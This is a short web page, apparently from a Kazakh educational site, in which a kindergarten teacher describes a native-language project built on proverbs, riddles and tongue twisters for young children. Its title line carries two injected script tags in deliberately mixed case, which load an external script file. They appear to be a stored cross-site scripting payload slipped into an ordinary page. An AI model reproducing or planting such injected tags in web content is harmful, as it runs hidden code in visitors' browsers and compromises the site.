"Этнопедагогика" басым бағыт бойынша жоба: «Ана тілім - асыл қазынам». Тәрбиеші Кабдушева Ж.Б.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
03.05.2024
«Ана тілім - асыл қазынам»
№8 «Құлыншақ» ересек тобының тәрбиешісі Кабдушева Жайнагуль Байбатыровна
Балаларды адамгершілікке тәрбиелеп, тілдерін дамыту мақсатында жұмбақтар, мақал-мәтелдер, жаңылтпаштарды қолданудың маңызы зор тиімді тәсіл екені белгілі.
Олар көбіне баланың ұғымын,түсінігін, дүниетанымын кеңейте түседі.
Қазақтың мақал — мәтелдері негізінен елдікке, ынтымақ — бірлікке, адамгершілікке, инабаттылыққа тәрбиелейді.
Жұмбақты шешуде бала ойланып, өз ойларын жеткізеді.
Балалар жаңылтпаш арқылы сөздерді дұрыс сөйлеуге, жеке дыбыстарды алмастырмай дұрыс айтуға үйренеді.
Бала тілін дамытуда, ой-өрісін кеңейтуде мақал-мәтелдер, жұмбақтар, жаңылтпаштар бәрі де балабақшада баланың тілінің дамуына әсер етеді.
Просмотров: 959